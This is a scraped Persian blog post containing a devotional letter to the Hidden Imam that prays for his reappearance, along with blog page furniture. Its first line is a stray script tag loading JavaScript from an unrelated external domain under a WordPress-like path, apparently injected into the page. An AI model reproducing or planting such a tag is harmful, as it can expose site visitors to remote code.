script type=’text/javascript’ src=’http://taklearn.ir/wp-includes/js/l10n.js?ver=20101110′> نامه اي به امام : مولا جان يگانه محبوبم
منجی عشق
این وبلاگ قصد دارد شما را با موضوع مهدویت بیشتر آشنا کند

 

 نامه اي به امام : مولا جان يگانه محبوبم

تابه كي از وجود مقدستان محروم باشيم و تا كي روزها را در انتظار تان بگذرانيم و از ديدار شما اي قطب عالم امكان بي نصيب باشيم .

مولا جان روزها را مي گذرانيم بي آنكه ازشما خبري داشته باشيم هفته ها را سپري مي كنيم بي آنكه شما را ديده باشيم شبهاي جمعه كه مي رسد اشتياق ديدارتان را مي كشيم كه شايد اين شب در سحرگاه صداي نازنين و دلرباي شما رابشنويم و جان دوباره بگيريم .

اما آه

روزها و هفته ها ماهها وبلكه ساليان سال گذشته اماهنوز از ظهوركبري شما خبري نرسيده جزآنكه فرموده ايد به شيعيعان ما بگوئيد براي فرجمان دعا كنند.

اربابم مولاي من همه كارها در دست خداست و شما در نزد پروردگارتان آبرومند هستيد پس به حق مادرتان فاطمه اطهرسلام الله عليها قسمتان مي دهيم كه خود از خدا فرجتان را بخواهيد كه دعاي شما مستجاب است . يا صاحب الامر ارواحنا له الفداء جان ناقابل ما فداي خاك پايتان باد .

دنيا پراز ظلم و ستم گرديد ديگر نمي توان امربه معروف و نهي از منكر كرد منكر زياد شده واز معروف هم خبري نيست همه اين دردها و انحرافات و ظلمها ازآنجا آغاز شد كه در خانه جد مظلومتان را برروي بشريت بستند و ما را از نور مقدستان محروم كردند و بشر را در ظلمت دنيا حبس كردند و اجداد نازنينتان را يكي پس از ديگري مظلومانه به شهادت رساندند و ما كه امروز از درد فراق شما مي سوزيم و چاره اي جز صبر نداريم به شما پناه مي آوريم شماكه تنها يادگار جد مظلومتان هستيد .

پناه مي آوريم از اين همه ظلم و ستمي كه در جهان است و همه بشريت را فراگرفته .

و افسوس و صد افسوس كه بشر به اين همه ظلم عادت كرده و از ياد شما غافل شده و غافل است كه وجودمقدسي چون شما كه امام ما هستيد در كره زمين است و بايستي به او پناهنده شد .

آري صاحبي چون شما كه به يك باره به امر خدا با ظهورتان پايه هاي ظلم از كره زمين برچيده مي شود .

مولاجان ما را يتيم تصور كرده اند مي خواهند ريشه معروف را قطع كنند مي خواهند شيعيعان شما رااز بين ببرند آري مي خواهند دركره زمين ظالمين حكم فرما باشند .

محبوبم مولا جان خداوند عزوجل فرموده و قول خداوند حق است و تخلف نخواهد كرد كه صالحين وارثان زمين هستند .

و طبق امر جدتان خداوند امر ظهور شما را در يك شب اصلاح مي فرمايد .

مولا جان اگرشما تشريف بياوريد و قدم نازنين تان را برچشمان هميشه منتظر ما بگذاريد آن وقت همه امور اصلاح مي شود و راههاي انحرافي بسته و همه در صراط مستقيم قرار مي گيرند .پس اي نازنين خود از خدا وند فرجتان را بخواهيد كه دعاي شما مستجاب است .

بارالها از تو تقاضا دارم آن امامي كه براي ما حصن و پناهگاه قرار دادي برسان و برغيبتش خاتمه مرحمت بفرما .

آن طلعت فروزان كه مايه روشني چشم ماست برما عنايت فرما.

پروردگارا فراق آن هستي جانها و مونس قلبها سبب شده كه ديگر هيچ عيدي براي ما نباشد و هميشه همه وجودمان حزن فراگرفته باشد مارا به ديدار آن حضرت خرسند فرما.

اي رئوف به لطف و كرمت قسمت مي دهيم كه نعمتت را بر ما كامل بفرما و اين آرزوي ديرينه مارامستجاب فرما و ما را درآتش فراقش سوزان و وصال آن حضرت را برما آسان فرما .

آمين يارب العالمين


 

 


نظرات شما عزیزان:

نام :
آدرس ایمیل:
وب سایت/بلاگ :
متن پیام:
:) :( ;) :D
;)) :X :? :P
:* =(( :O };-
:B /:) =DD :S
-) :-(( :-| :-))
نظر خصوصی

 کد را وارد نمایید:

 

 

 

عکس شما

آپلود عکس دلخواه:





درباره وبلاگ

چه با شکوه است تصویر ایامی که تنها حاکم عالم، دادگستری چون قائم آل محمد(عج) باشد. و چه زیباست زندگی در ایامی که پرچمی جز پرچم توحید به اهتزاز نباشد و ندائی جز ندای حق به گوش جهانیان نرسد، دورانی سرشار از عطوفت، مهربانی، عدالت، آزادگی و کرامت انسانی.
موضوعات
پيوندها

تبادل لینک هوشمند
برای تبادل لینک  ابتدا ما را با عنوان منجی عشق و آدرس monjieeshgh.LoxBlog.ir لینک نمایید سپس مشخصات لینک خود را در زیر نوشته . در صورت وجود لینک ما در سایت شما لینکتان به طور خودکار در سایت ما قرار میگیرد.





نويسندگان


ورود اعضا:

نام :
وب :
پیام :
2+2=:
(Refresh)

خبرنامه وب سایت:





آمار وب سایت:  

بازدید امروز : 1
بازدید دیروز : 4
بازدید هفته : 1
بازدید ماه : 253
بازدید کل : 33022
تعداد مطالب : 50
تعداد نظرات : 14
تعداد آنلاین : 1